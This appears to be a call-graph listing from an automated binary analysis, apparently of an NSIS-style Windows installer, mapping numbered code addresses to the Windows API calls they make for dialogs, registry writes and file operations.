ShowWindow 3739->3746 3740 40518e 3752 406831 18 API calls 3740->3752 3747 403df6 8 API calls 3741->3747 3784 403dc4 SendMessageW 3742->3784 3743->3741 3748 405389 SendMessageW 3743->3748 3749 403d44 SendMessageW 3745->3749 3750 405377 3746->3750 3751 405369 3746->3751 3757 4052ba 3747->3757 3756 4053a2 CreatePopupMenu 3748->3756 3748->3757 3749->3741 3755 403d44 SendMessageW 3750->3755 3753 404f9e 25 API calls 3751->3753 3754 4051ad 3752->3754 3753->3750 3758 4062cf 11 API calls 3754->3758 3755->3743 3759 406831 18 API calls 3756->3759 3760 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3758->3760 3761 4053b2 AppendMenuW 3759->3761 3762 405203 SendMessageW SendMessageW 3760->3762 3763 40521f 3760->3763 3764 4053c5 GetWindowRect 3761->3764 3765 4053d8 3761->3765 3762->3763 3766 405232 3763->3766 3767 405224 SendMessageW 3763->3767 3768 4053df TrackPopupMenu 3764->3768 3765->3768 3769 403d6b 19 API calls 3766->3769 3767->3766 3768->3757 3770 4053fd 3768->3770 3771 405242 3769->3771 3772 405419 SendMessageW 3770->3772 3773 40524b ShowWindow 3771->3773 3774 40527f GetDlgItem SendMessageW 3771->3774 3772->3772 3775 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3772->3775 3776 405261 ShowWindow 3773->3776 3777 40526e 3773->3777 3774->3757 3778 4052a2 SendMessageW SendMessageW 3774->3778 3779 40545b SendMessageW 3775->3779 3776->3777 3783 403dc4 SendMessageW 3777->3783 3778->3757 3779->3779 3780 405486 GlobalUnlock SetClipboardData CloseClipboard 3779->3780 3780->3757 3782->3740 3783->3774 3784->3739 3786 403ddb SendMessageW 3785->3786 3790 405096 3786->3790 3787 403ddb SendMessageW 3788 4050d1 OleUninitialize 3787->3788 3789 4062cf 11 API calls 3789->3790 3790->3789 3791 40139d 80 API calls 3790->3791 3792 4050c1 3790->3792 3791->3790 3792->3787 4619 4020f9 GetDC GetDeviceCaps 4620 401446 18 API calls 4619->4620 4621 402116 MulDiv 4620->4621 4622 401446 18 API calls 4621->4622 4623 40212c 4622->4623 4624 406831 18 API calls 4623->4624 4625 402165 CreateFontIndirectW 4624->4625 4626 4030dc 4625->4626 4627 4030e3 4626->4627 4629 405f7d wsprintfW 4626->4629 4629->4627 4630 4024fb 4631 40145c 18 API calls 4630->4631 4632 402502 4631->4632 4633 40145c 18 API calls 4632->4633 4634 40250c 4633->4634 4635 40145c 18 API calls 4634->4635 4636 402515 4635->4636 4637 40145c 18 API calls 4636->4637 4638 40251f 4637->4638 4639 40145c 18 API calls 4638->4639 4640 402529 4639->4640 4641 40253d 4640->4641 4642 40145c 18 API calls 4640->4642 4643 4062cf 11 API calls 4641->4643 4642->4641 4644 40256a CoCreateInstance 4643->4644 4645 40258c 4644->4645 4646 4026fc 4648 402708 4646->4648 4649 401ee4 4646->4649 4647 406831 18 API calls 4647->4649 4649->4646 4649->4647 3793 4019fd 3794 40145c 18 API calls 3793->3794 3795 401a04 3794->3795 3798 405eab 3795->3798 3799 405eb8 GetTickCount GetTempFileNameW 3798->3799 3800 401a0b 3799->3800 3801 405eee 3799->3801 3801->3799 3801->3800 4650 4022fd 4651 40145c 18 API calls 4650->4651 4652 402304 GetFileVersionInfoSizeW 4651->4652 4653 4030e3 4652->4653 4654 40232b GlobalAlloc 4652->4654 4654->4653 4655 40233f GetFileVersionInfoW 4654->4655 4656 402350 VerQueryValueW 4655->4656 4657 402381 GlobalFree 4655->4657 4656->4657 4658 402369 4656->4658 4657->4653 4663 405f7d wsprintfW 4658->4663 4661 402375 4664 405f7d wsprintfW 4661->4664 4663->4661 4664->4657 4665 402afd 4666 40145c 18 API calls 4665->4666 4667 402b04 4666->4667 4672 405e7c GetFileAttributesW CreateFileW 4667->4672 4669 402b10 4670 4030e3 4669->4670 4673 405f7d wsprintfW 4669->4673 4672->4669 4673->4670 4674 4029ff 4675 401553 19 API calls 4674->4675 4676 402a09 4675->4676 4677 40145c 18 API calls 4676->4677 4678 402a12 4677->4678 4679 402a1f RegQueryValueExW 4678->4679 4683 401a13 4678->4683 4680 402a45 4679->4680 4681 402a3f 4679->4681 4682 4029e4 RegCloseKey 4680->4682 4680->4683 4681->4680 4685 405f7d wsprintfW 4681->4685 4682->4683 4685->4680 4686 401000 4687 401037 BeginPaint GetClientRect 4686->4687 4688 40100c DefWindowProcW 4686->4688 4690 4010fc 4687->4690 4691 401182 4688->4691 4692 401073 CreateBrushIndirect FillRect DeleteObject 4690->4692 4693 401105 4690->4693 4692->4690 4694 401170 EndPaint 4693->4694 4695 40110b CreateFontIndirectW 4693->4695 4694->4691 4695->4694 4696 40111b 6 API calls 4695->4696 4696->4694 4697 401f80 4698 401446 18 API calls 4697->4698 4699 401f88 4698->4699 4700 401446 18 API calls 4699->4700 4701 401f93 4700->4701 4702 401fa3 4701->4702 4703 40145c 18 API calls 4701->4703 4704 401fb3 4702->4704 4705 40145c 18 API calls 4702->4705 4703->4702 4706 402006 4704->4706 4707 401fbc 4704->4707 4705->4704 4708 40145c 18 API calls 4706->4708 4709 401446 18 API calls 4707->4709 4710 40200d 4708->4710 4711 401fc4 4709->4711 4713 40145c 18 API calls 4710->4713 4712 401446 18 API calls 4711->4712 4714 401fce 4712->4714 4715 402016 FindWindowExW 4713->4715 4716 401ff6 SendMessageW 4714->4716 4717 401fd8 SendMessageTimeoutW 4714->4717 4719 402036 4715->4719 4716->4719 4717->4719 4718 4030e3 4719->4718 4721 405f7d wsprintfW 4719->4721 4721->4718 4722 402880 4723 402884 4722->4723 4724 40145c 18 API calls 4723->4724 4725 4028a7 4724->4725 4726 40145c 18 API calls 4725->4726 4727 4028b1 4726->4727 4728 4028ba RegCreateKeyExW 4727->4728 4729 4028e8 4728->4729 4734 4029ef 4728->4734 4730 402934 4729->4730 4732 40145c 18 API calls 4729->4732 4731 402963 4730->4731 4733 401446 18 API calls 4730->4733 4735 4029ae RegSetValueExW 4731->4735 4738 40337f 33 API calls 4731->4738 4736 4028fc lstrlenW 4732->4736 4737 402947 4733->4737 4741 4029c6 RegCloseKey 4735->4741 4742 4029cb 4735->4742 4739 402918 4736->4739 4740 40292a 4736->4740 4744 4062cf 11 API calls 4737->4744 4745 40297b 4738->4745 4746 4062cf 11 API calls 4739->4746 4747 4062cf 11 API calls 4740->4747 4741->4734 4743 4062cf 11 API calls 4742->4743 4743->4741 4744->4731 4753 406250 4745->4753 4750 402922 4746->4750 4747->4730 4750->4735 4752 4062cf 11 API calls 4752->4750 4754 406273 4753->4754 4755 4062b6 4754->4755 4756 406288 wsprintfW 4754->4756 4757 402991 4755->4757 4758 4062bf lstrcatW 4755->4758 4756->4755 4756->4756 4757->4752 4758->4757 4759 403d02 4760 403d0d 4759->4760 4761 403d11 4760->4761 4762 403d14 GlobalAlloc 4760->4762 4762->4761 4763 402082 4764 401446 18 API calls 4763->4764 4765 402093 SetWindowLongW 4764->4765 4766 4030e3 4765->4766 4767 402a84 4768 401553 19 API calls 4767->4768 4769 402a8e 4768->4769 4770 401446 18 API calls 4769->4770 4771 402a98 4770->4771 4772 401a13 4771->4772 4773 402ab2 RegEnumKeyW 4771->4773 4774 402abe RegEnumValueW 4771->4774 4775 402a7e 4773->4775 4774->4772 4774->4775 4775->4772 4776 4029e4 RegCloseKey 4775->4776 4776->4772 4777 402c8a 4778 402ca2 4777->4778 4779 402c8f 4777->4779 4781 40145c 18 API calls 4778->4781 4780 401446 18 API calls 4779->4780 4783 402c97 4780->4783 4782 402ca9 lstrlenW 4781->4782 4782->4783 4784 401a13 4783->4784 4785 402ccb WriteFile 4783->4785 4785->4784 4786 401d8e 4787 40145c 18 API calls 4786->4787 4788 401d95 ExpandEnvironmentStringsW 4787->4788 4789 401da8 4788->4789 4790 401db9 4788->4790 4789->4790 4791 401dad lstrcmpW 4789->4791 4791->4790 4792 401e0f 4793 401446 18 API calls 4792->4793 4794 401e17 4793->4794 4795 401446 18 API calls 4794->4795 4796 401e21 4795->4796 4797 4030e3 4796->4797 4799 405f7d wsprintfW 4796->4799 4799->4797 4800 40438f 4801 4043c8 4800->4801 4802 40439f 4800->4802 4803 403df6 8 API calls 4801->4803 4804 403d6b 19 API calls 4802->4804 4806 4043d4 4803->4806 4805 4043ac SetDlgItemTextW 4804->4805 4805->4801 4807 403f90 4808 403fa0 4807->4808 4809 403fbc 4807->4809 4818 405cb0 GetDlgItemTextW 4808->4818 4811 403fc2 SHGetPathFromIDListW 4809->4811 4812 403fef 4809->4812 4814 403fd2 4811->4814 4817 403fd9 SendMessageW 4811->4817 4813 403fad SendMessageW 4813->4809 4815 40141d 80 API calls 4814->4815 4815->4817 4817->4812 4818->4813 4819 402392 4820 40145c 18 API calls 4819->4820 4821 402399 4820->4821 4824 407224 4821->4824 4825 406efe 25 API calls 4824->4825 4826 407244 4825->4826 4827 4023a7 4826->4827 4828 40724e lstrcpynW lstrcmpW 4826->4828 4829 407280 4828->4829 4830 407286 lstrcpynW 4828->4830 4829->4830 4830->4827 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3403 406113 3360->3403 3372 40683e 3363->3372 3364 406aab 3365 401488 3364->3365 3398 406035 lstrcpynW 3364->3398 3365->3358 3382 406064 3365->3382 3367 4068ff GetVersion 3377 40690c 3367->3377 3368 406a72 lstrlenW 3368->3372 3370 406831 10 API calls 3370->3368 3372->3364 3372->3367 3372->3368 3372->3370 3375 406064 5 API calls 3372->3375 3396 405f7d wsprintfW 3372->3396 3397 406035 lstrcpynW 3372->3397 3374 40697e GetSystemDirectoryW 3374->3377 3375->3372 3376 406991 GetWindowsDirectoryW 3376->3377 3377->3372 3377->3374 3377->3376 3378 406831 10 API calls 3377->3378 3379 406a0b lstrcatW 3377->3379 3380 4069c5 SHGetSpecialFolderLocation 3377->3380 3391 405eff RegOpenKeyExW 3377->3391 3378->3377 3379->3372 3380->3377 3381 4069dd SHGetPathFromIDListW CoTaskMemFree 3380->3381 3381->3377 3389 406071 3382->3389 3383 4060e7 3384 4060ed CharPrevW 3383->3384 3386 40610d 3383->3386 3384->3383 3385 4060da CharNextW 3385->3383 3385->3389 3386->3358 3388 4060c6 CharNextW 3388->3389 3389->3383 3389->3385 3389->3388 3390 4060d5 CharNextW 3389->3390 3399 405d32 3389->3399 3390->3385 3392 405f33 RegQueryValueExW 3391->3392 3393 405f78 3391->3393 3394 405f55 RegCloseKey 3392->3394 3393->3377 3394->3393 3396->3372 3397->3372 3398->3365 3400 405d38 3399->3400 3401 405d4e 3400->3401 3402 405d3f CharNextW 3400->3402 3401->3389 3402->3400 3404 40613c 3403->3404 3405 40611f 3403->3405 3407 4061b3 3404->3407 3408 406159 3404->3408 3409 40277f WritePrivateProfileStringW 3404->3409 3406 406129 CloseHandle 3405->3406 3405->3409 3406->3409 3407->3409 3410 4061bc lstrcatW lstrlenW WriteFile 3407->3410 3408->3410 3411 406162 GetFileAttributesW 3408->3411 3410->3409 3416 405e7c GetFileAttributesW CreateFileW 3411->3416 3413 40617e 3413->3409 3414 4061a8 SetFilePointer 3413->3414 3415 40618e WriteFile 3413->3415 3414->3407 3415->3414 3416->3413 4831 402797 4832 40145c 18 API calls 4831->4832 4833 4027ae 4832->4833 4834 40145c 18 API calls 4833->4834 4835 4027b7 4834->4835 4836 40145c 18 API calls 4835->4836 4837 4027c0 GetPrivateProfileStringW lstrcmpW 4836->4837 4838 401e9a 4839 40145c 18 API calls 4838->4839 4840 401ea1 4839->4840 4841 401446 18 API calls 4840->4841 4842 401eab wsprintfW 4841->4842 3802 401a1f 3803 40145c 18 API calls 3802->3803 3804 401a26 3803->3804 3805 4062cf 11 API calls 3804->3805 3806 401a49 3805->3806 3807 401a64 3806->3807 3808 401a5c 3806->3808 3877 406035 lstrcpynW 3807->3877 3876 406035 lstrcpynW 3808->3876 3811 401a6f 3878 40674e lstrlenW CharPrevW 3811->3878 3812 401a62 3815 406064 5 API calls 3812->3815 3846 401a81 3815->3846 3816 406301 2 API calls 3816->3846 3819 401a98 CompareFileTime 3819->3846 3820 401ba9 3821 404f9e 25 API calls 3820->3821 3823 401bb3 3821->3823 3822 401b5d 3824 404f9e 25 API calls 3822->3824 3855 40337f 3823->3855 3826 401b70 3824->3826 3830 4062cf 11 API calls 3826->3830 3828 406035 lstrcpynW 3828->3846 3829 4062cf 11 API calls 3831 401bda 3829->3831 3835 401b8b 3830->3835 3832 401be9 SetFileTime 3831->3832 3833 401bf8 CloseHandle 3831->3833 3832->3833 3833->3835 3836 401c09 3833->3836 3834 406831 18 API calls 3834->3846 3837 401c21 3836->3837 3838 401c0e 3836->3838 3839 406831 18 API calls 3837->3839 3840 406831 18 API calls 3838->3840 3841 401c29 3839->3841 3843 401c16 lstrcatW 3840->3843 3844 4062cf 11 API calls 3841->3844 3843->3841 3847 401c34 3844->3847 3845 401b50 3849 401b93 3845->3849 3850 401b53 3845->3850 3846->3816 3846->3819 3846->3820 3846->3822 3846->3828 3846->3834 3846->3845 3848 4062cf 11 API calls 3846->3848 3854 405e7c GetFileAttributesW CreateFileW 3846->3854 3881 405e5c GetFileAttributesW 3846->3881 3884 405ccc 3846->3884 3851 405ccc MessageBoxIndirectW 3847->3851 3848->3846 3852 4062cf 11 API calls 3849->3852 3853 4062cf 11 API calls 3850->3853 3851->3835 3852->3835 3853->3822 3854->3846 3856 40339a 3855->3856 3857 4033c7 3856->3857 3890 403368 SetFilePointer 3856->3890 3888 403336 ReadFile 3857->3888 3861 401bc6 3861->3829 3862 403546 3864 40354a 3862->3864 3865 40356e 3862->3865 3863 4033eb GetTickCount 3863->3861 3868 403438 3863->3868 3866 403336 ReadFile 3864->3866 3865->3861 3869 403336 ReadFile 3865->3869 3870 40358d WriteFile 3865->3870 3866->3861 3867 403336 ReadFile 3867->3868 3868->3861 3868->3867 3872 40348a GetTickCount 3868->3872 3873 4034af MulDiv wsprintfW 3868->3873 3875 4034f3 WriteFile 3868->3875 3869->3865 3870->3861 3871 4035a1 3870->3871 3871->3861 3871->3865 3872->3868 3874 404f9e 25 API calls 3873->3874 3874->3868 3875->3861 3875->3868 3876->3812 3877->3811 3879 401a75 lstrcatW 3878->3879 3880 40676b lstrcatW 3878->3880 3879->3812 3880->3879 3882 405e79 3881->3882 3883 405e6b SetFileAttributesW 3881->3883 3882->3846 3883->3882 3885 405ce1 3884->3885 3886 405d2f 3885->3886 3887 405cf7 MessageBoxIndirectW 3885->3887 3886->3846 3887->3886 3889 403357 3888->3889 3889->3861 3889->3862 3889->3863 3890->3857 4843 40209f GetDlgItem GetClientRect 4844 40145c 18 API calls 4843->4844 4845 4020cf LoadImageW SendMessageW 4844->4845 4846 4030e3 4845->4846 4847 4020ed DeleteObject 4845->4847 4847->4846 4848 402b9f 4849 401446 18 API calls 4848->4849 4853 402ba7 4849->4853 4850 402c4a 4851 402bdf ReadFile 4851->4853 4860 402c3d 4851->4860 4852 401446 18 API calls 4852->4860 4853->4850 4853->4851 4854 402c06 MultiByteToWideChar 4853->4854 4855 402c3f 4853->4855 4856 402c4f 4853->4856 4853->4860 4854->4853 4854->4856 4861 405f7d wsprintfW 4855->4861 4858 402c6b SetFilePointer 4856->4858 4856->4860 4858->4860 4859 402d17 ReadFile 4859->4860 4860->4850 4860->4852 4860->4859 4861->4850 3417 402b23 GlobalAlloc 3418 402b39 3417->3418 3419 402b4b 3417->3419 3428 401446 3418->3428 3421 40145c 18 API calls 3419->3421 3422 402b52 WideCharToMultiByte lstrlenA 3421->3422 3423 402b41 3422->3423 3424 402b84 WriteFile 3423->3424 3425 402b93 3423->3425 3424->3425 3426 402384 GlobalFree 3424->3426 3426->3425 3429 406831 18 API calls 3428->3429 3430 401455 3429->3430 3430->3423 4862 4040a3 4863 4040b0 lstrcpynW lstrlenW 4862->4863 4864 4040ad 4862->4864 4864->4863 3441 4054a5 3442 4055f9 3441->3442 3443 4054bd 3441->3443 3445 40564a 3442->3445 3446 40560a GetDlgItem GetDlgItem 3442->3446 3443->3442 3444 4054c9 3443->3444 3448 4054d4 SetWindowPos 3444->3448 3449 4054e7 3444->3449 3447 4056a4 3445->3447 3455 40139d 80 API calls 3445->3455 3450 403d6b 19 API calls 3446->3450 3456 4055f4 3447->3456 3511 403ddb 3447->3511 3448->3449 3452 405504 3449->3452 3453 4054ec ShowWindow 3449->3453 3454 405634 SetClassLongW 3450->3454 3457 405526 3452->3457 3458 40550c DestroyWindow 3452->3458 3453->3452 3459 40141d 80 API calls 3454->3459 3462 40567c 3455->3462 3460 40552b SetWindowLongW 3457->3460 3461 40553c 3457->3461 3463 405908 3458->3463 3459->3445 3460->3456 3464 4055e5 3461->3464 3465 405548 GetDlgItem 3461->3465 3462->3447 3466 405680 SendMessageW 3462->3466 3463->3456 3472 405939 ShowWindow 3463->3472 3531 403df6 3464->3531 3469 405578 3465->3469 3470 40555b SendMessageW IsWindowEnabled 3465->3470 3466->3456 3467 40141d 80 API calls 3480 4056b6 3467->3480 3468 40590a DestroyWindow KiUserCallbackDispatcher 3468->3463 3474 405585 3469->3474 3477 4055cc SendMessageW 3469->3477 3478 405598 3469->3478 3486 40557d 3469->3486 3470->3456 3470->3469 3472->3456 3473 406831 18 API calls 3473->3480 3474->3477 3474->3486 3476 403d6b 19 API calls 3476->3480 3477->3464 3481 4055a0 3478->3481 3482 4055b5 3478->3482 3479 4055b3 3479->3464 3480->3456 3480->3467 3480->3468 3480->3473 3480->3476 3502 40584a DestroyWindow 3480->3502 3514 403d6b 3480->3514 3525 40141d 3481->3525 3483 40141d 80 API calls 3482->3483 3485 4055bc 3483->3485 3485->3464 3485->3486 3528 403d44 3486->3528 3488 405731 GetDlgItem 3489 405746 3488->3489 3490 40574f ShowWindow KiUserCallbackDispatcher 3488->3490 3489->3490 3517 403db1 KiUserCallbackDispatcher 3490->3517 3492 405779 EnableWindow 3495 40578d 3492->3495 3493 405792 GetSystemMenu EnableMenuItem SendMessageW 3494 4057c2 SendMessageW 3493->3494 3493->3495 3494->3495 3495->3493 3518 403dc4 SendMessageW 3495->3518 3519 406035 lstrcpynW 3495->3519 3498 4057f0 lstrlenW 3499 406831 18 API calls 3498->3499 3500 405806 SetWindowTextW 3499->3500 3520 40139d 3500->3520 3502->3463 3503 405864 CreateDialogParamW 3502->3503 3503->3463 3504 405897 3503->3504 3505 403d6b 19 API calls 3504->3505 3506 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3505->3506 3507 40139d 80 API calls 3506->3507 3508 4058e8 3507->3508 3508->3456 3509 4058f0 ShowWindow 3508->3509 3510 403ddb SendMessageW 3509->3510 3510->3463 3512 403df3 3511->3512 3513 403de4 SendMessageW 3511->3513 3512->3480 3513->3512 3515 406831 18 API calls 3514->3515 3516 403d76 SetDlgItemTextW 3515->3516 3516->3488 3517->3492 3518->3495 3519->3498 3523 4013a4 3520->3523 3521 401410 3521->3480 3523->3521 3524 4013dd MulDiv SendMessageW 3523->3524 3545 4015a0 3523->3545 3524->3523 3526 40139d 80 API calls 3525->3526 3527 401432 3526->3527 3527->3486 3529 403d51 SendMessageW 3528->3529 3530 403d4b 3528->3530 3529->3479 3530->3529 3532 403e0b GetWindowLongW 3531->3532 3542 403e94 3531->3542 3533 403e1c 3532->3533 3532->3542 3534 403e2b GetSysColor 3533->3534 3535 403e2e 3533->3535 3534->3535 3536 403e34 SetTextColor 3535->3536 3537 403e3e SetBkMode 3535->3537 3536->3537 3538 403e56 GetSysColor 3537->3538 3539 403e5c 3537->3539 3538->3539 3540 403e63 SetBkColor 3539->3540 3541 403e6d 3539->3541 3540->3541 3541->3542 3543 403e80 DeleteObject 3541->3543 3544 403e87 CreateBrushIndirect 3541->3544 3542->3456 3543->3544 3544->3542 3546 4015fa 3545->3546 3625 40160c 3545->3625 3547 401601 3546->3547 3548 401742 3546->3548 3549 401962 3546->3549 3550 4019ca 3546->3550 3551 40176e 3546->3551 3552 401650 3546->3552 3553 4017b1 3546->3553 3554 401672 3546->3554 3555 401693 3546->3555 3556 401616 3546->3556 3557 4016d6 3546->3557 3558 401736 3546->3558 3559 401897 3546->3559 3560 4018db 3546->3560 3561 40163c 3546->3561 3562 4016bd 3546->3562 3546->3625 3571 4062cf 11 API calls 3547->3571 3563 401751 ShowWindow 3548->3563 3564 401758 3548->3564 3568 40145c 18 API calls 3549->3568 3575 40145c 18 API calls 3550->3575 3565 40145c 18 API calls 3551->3565 3589 4062cf 11 API calls 3552->3589 3569 40145c 18 API calls 3553->3569 3566 40145c 18 API calls 3554->3566 3570 401446 18 API calls 3555->3570 3574 40145c 18 API calls 3556->3574 3588 401446 18 API calls 3557->3588 3557->3625 3558->3625 3679 405f7d wsprintfW 3558->3679 3567 40145c 18 API calls 3559->3567 3572 40145c 18 API calls 3560->3572 3576 401647 PostQuitMessage 3561->3576 3561->3625 3573 4062cf 11 API calls 3562->3573 3563->3564 3577 401765 ShowWindow 3564->3577 3564->3625 3578 401775 3565->3578 3579 401678 3566->3579 3580 40189d 3567->3580 3581 401968 GetFullPathNameW 3568->3581 3582 4017b8 3569->3582 3583 40169a 3570->3583 3571->3625 3584 4018e2 3572->3584 3585 4016c7 SetForegroundWindow 3573->3585 3586 40161c 3574->3586 3587 4019d1 SearchPathW 3575->3587 3576->3625 3577->3625 3591 4062cf 11 API calls 3578->3591 3592 4062cf 11 API calls 3579->3592 3670 406301 FindFirstFileW 3580->3670 3594 4019a1 3581->3594 3595 40197f 3581->3595 3596 4062cf 11 API calls 3582->3596 3597 4062cf 11 API calls 3583->3597 3598 40145c 18 API calls 3584->3598 3585->3625 3599 4062cf 11 API calls 3586->3599 3587->3558 3587->3625 3588->3625 3600 401664 3589->3600 3601 401785 SetFileAttributesW 3591->3601 3602 401683 3592->3602 3614 4019b8 GetShortPathNameW 3594->3614 3594->3625 3595->3594 3620 406301 2 API calls 3595->3620 3604 4017c9 3596->3604 3605 4016a7 Sleep 3597->3605 3606 4018eb 3598->3606 3607 401627 3599->3607 3608 40139d 65 API calls 3600->3608 3609 40179a 3601->3609 3601->3625 3618 404f9e 25 API calls 3602->3618 3652 405d85 CharNextW CharNextW 3604->3652 3605->3625 3615 40145c 18 API calls 3606->3615 3616 404f9e 25 API calls 3607->3616 3608->3625 3617 4062cf 11 API calls 3609->3617 3610 4018c2 3621 4062cf 11 API calls 3610->3621 3611 4018a9 3619 4062cf 11 API calls 3611->3619 3614->3625 3623 4018f5 3615->3623 3616->3625 3617->3625 3618->3625 3619->3625 3624 401991 3620->3624 3621->3625 3622 4017d4 3626 401864 3622->3626 3629 405d32 CharNextW 3622->3629 3647 4062cf 11 API calls 3622->3647 3627 4062cf 11 API calls 3623->3627 3624->3594 3678 406035 lstrcpynW 3624->3678 3625->3523 3626->3602 3628 40186e 3626->3628 3630 401902 MoveFileW 3627->3630 3658 404f9e 3628->3658 3633 4017e6 CreateDirectoryW 3629->3633 3634 401912 3630->3634 3635 40191e 3630->3635 3633->3622 3637 4017fe GetLastError 3633->3637 3634->3602 3641 406301 2 API calls 3635->3641 3651 401942 3635->3651 3639 401827 GetFileAttributesW 3637->3639 3640 40180b GetLastError 3637->3640 3639->3622 3644 4062cf 11 API calls 3640->3644 3645 401929 3641->3645 3642 401882 SetCurrentDirectoryW 3642->3625 3643 4062cf 11 API calls 3646 40195c 3643->3646 3644->3622 3645->3651 3673 406c94 3645->3673 3646->3625 3647->3622 3650 404f9e 25 API calls 3650->3651 3651->3643 3653 405da2 3652->3653 3656 405db4 3652->3656 3655 405daf CharNextW 3653->3655 3653->3656 3654 405dd8 3654->3622 3655->3654 3656->3654 3657 405d32 CharNextW 3656->3657 3657->3656 3659 404fb7 3658->3659 3660 401875 3658->3660 3661 404fd5 lstrlenW 3659->3661 3662 406831 18 API calls 3659->3662 3669 406035 lstrcpynW 3660->3669 3663 404fe3 lstrlenW 3661->3663 3664 404ffe 3661->3664 3662->3661 3663->3660 3665 404ff5 lstrcatW 3663->3665 3666 405011 3664->3666 3667 405004 SetWindowTextW 3664->3667 3665->3664 3666->3660 3668 405017 SendMessageW SendMessageW SendMessageW 3666->3668 3667->3666 3668->3660 3669->3642 3671 4018a5 3670->3671 3672 406317 FindClose 3670->3672 3671->3610 3671->3611 3672->3671 3680 406328 GetModuleHandleA 3673->3680 3677 401936 3677->3650 3678->3594 3679->3625 3681 406340 LoadLibraryA 3680->3681 3682 40634b GetProcAddress 3680->3682 3681->3682 3683 406359 3681->3683 3682->3683 3683->3677 3684 406ac5 lstrcpyW 3683->3684 3685 406b13 GetShortPathNameW 3684->3685 3686 406aea 3684->3686 3687 406b2c 3685->3687 3688 406c8e 3685->3688 3710 405e7c GetFileAttributesW CreateFileW 3686->3710 3687->3688 3691 406b34 WideCharToMultiByte 3687->3691 3688->3677 3690 406af3 CloseHandle GetShortPathNameW 3690->3688 3692 406b0b 3690->3692 3691->3688 3693 406b51 WideCharToMultiByte 3691->3693 3692->3685 3692->3688 3693->3688 3694 406b69 wsprintfA 3693->3694 3695 406831 18 API calls 3694->3695 3696 406b95 3695->3696 3711 405e7c GetFileAttributesW CreateFileW 3696->3711 3698 406ba2 3698->3688 3699 406baf GetFileSize GlobalAlloc 3698->3699 3700 406bd0 ReadFile 3699->3700 3701 406c84 CloseHandle 3699->3701 3700->3701 3702 406bea 3700->3702 3701->3688 3702->3701 3712 405de2 lstrlenA 3702->3712 3705 406c03 lstrcpyA 3708 406c25 3705->3708 3706 406c17 3707 405de2 4 API calls 3706->3707 3707->3708 3709 406c5c SetFilePointer WriteFile GlobalFree 3708->3709 3709->3701 3710->3690 3711->3698 3713 405e23 lstrlenA 3712->3713 3714 405e2b 3713->3714 3715 405dfc lstrcmpiA 3713->3715 3714->3705 3714->3706 3715->3714 3716 405e1a CharNextA 3715->3716 3716->3713 4865 402da5 4866 4030e3 4865->4866 4867 402dac 4865->4867 4868 401446 18 API calls 4867->4868 4869 402db8 4868->4869 4870 402dbf SetFilePointer 4869->4870 4870->4866 4871 402dcf 4870->4871 4871->4866 4873 405f7d wsprintfW 4871->4873 4873->4866 4874 4049a8 GetDlgItem GetDlgItem 4875 4049fe 7 API calls 4874->4875 4880 404c16 4874->4880 4876 404aa2 DeleteObject 4875->4876 4877 404a96 SendMessageW 4875->4877 4878 404aad 4876->4878 4877->4876 4881 404ae4 4878->4881 4884 406831 18 API calls 4878->4884 4879 404cfb 4882 404da0 4879->4882 4883 404c09 4879->4883 4888 404d4a SendMessageW 4879->4888 4880->4879 4892 40487a 5 API calls 4880->4892 4905 404c86 4880->4905 4887 403d6b 19 API calls 4881->4887 4885 404db5 4882->4885 4886 404da9 SendMessageW 4882->4886 4889 403df6 8 API calls 4883->4889 4890 404ac6 SendMessageW SendMessageW 4884->4890 4897 404dc7 ImageList_Destroy 4885->4897 4898 404dce 4885->4898 4903 404dde 4885->4903 4886->4885 4893 404af8 4887->4893 4888->4883 4895 404d5f SendMessageW 4888->4895 4896 404f97 4889->4896 4890->4878 4891 404ced SendMessageW 4891->4879 4892->4905 4899 403d6b 19 API calls 4893->4899 4894 404f48 4894->4883 4904 404f5d ShowWindow GetDlgItem ShowWindow 4894->4904 4900 404d72 4895->4900 4897->4898 4901 404dd7 GlobalFree 4898->4901 4898->4903 4907 404b09 4899->4907 4909 404d83 SendMessageW 4900->4909 4901->4903 4902 404bd6 GetWindowLongW SetWindowLongW 4906 404bf0 4902->4906 4903->4894 4908 40141d 80 API calls 4903->4908 4918 404e10 4903->4918 4904->4883 4905->4879 4905->4891 4910 404bf6 ShowWindow 4906->4910 4911 404c0e 4906->4911 4907->4902 4913 404b65 SendMessageW 4907->4913 4914 404bd0 4907->4914 4916 404b93 SendMessageW 4907->4916 4917 404ba7 SendMessageW 4907->4917 4908->4918 4909->4882 4925 403dc4 SendMessageW 4910->4925 4926 403dc4 SendMessageW 4911->4926 4913->4907 4914->4902 4914->4906 4916->4907 4917->4907 4919 404e54 4918->4919 4922 404e3e SendMessageW 4918->4922 4920 404f1f InvalidateRect 4919->4920 4924 404ecd SendMessageW SendMessageW 4919->4924 4920->4894 4921 404f35 4920->4921 4923 4043d9 21 API calls 4921->4923 4922->4919 4923->4894 4924->4919 4925->4883 4926->4880 4927 4030a9 SendMessageW 4928 4030c2 InvalidateRect 4927->4928 4929 4030e3 4927->4929 4928->4929 3891 4038af #17 SetErrorMode OleInitialize 3892 406328 3 API calls 3891->3892 3893 4038f2 SHGetFileInfoW 3892->3893 3965 406035 lstrcpynW 3893->3965 3895 40391d GetCommandLineW 3966 406035 lstrcpynW 3895->3966 3897 40392f GetModuleHandleW 3898 403947 3897->3898 3899 405d32 CharNextW 3898->3899 3900 403956 CharNextW 3899->3900 3911 403968 3900->3911 3901 403a02 3902 403a21 GetTempPathW 3901->3902 3967 4037f8 3902->3967 3904 403a37 3906 403a3b GetWindowsDirectoryW lstrcatW 3904->3906 3907 403a5f DeleteFileW 3904->3907 3905 405d32 CharNextW 3905->3911 3909 4037f8 11 API calls 3906->3909 3975 4035b3 GetTickCount GetModuleFileNameW 3907->3975 3912 403a57 3909->3912 3910 403a73 3913 403af8 3910->3913 3915 405d32 CharNextW 3910->3915 3951 403add 3910->3951 3911->3901 3911->3905 3918 403a04 3911->3918 3912->3907 3912->3913 4060 403885 3913->4060 3919 403a8a 3915->3919 4067 406035 lstrcpynW 3918->4067 3930 403b23 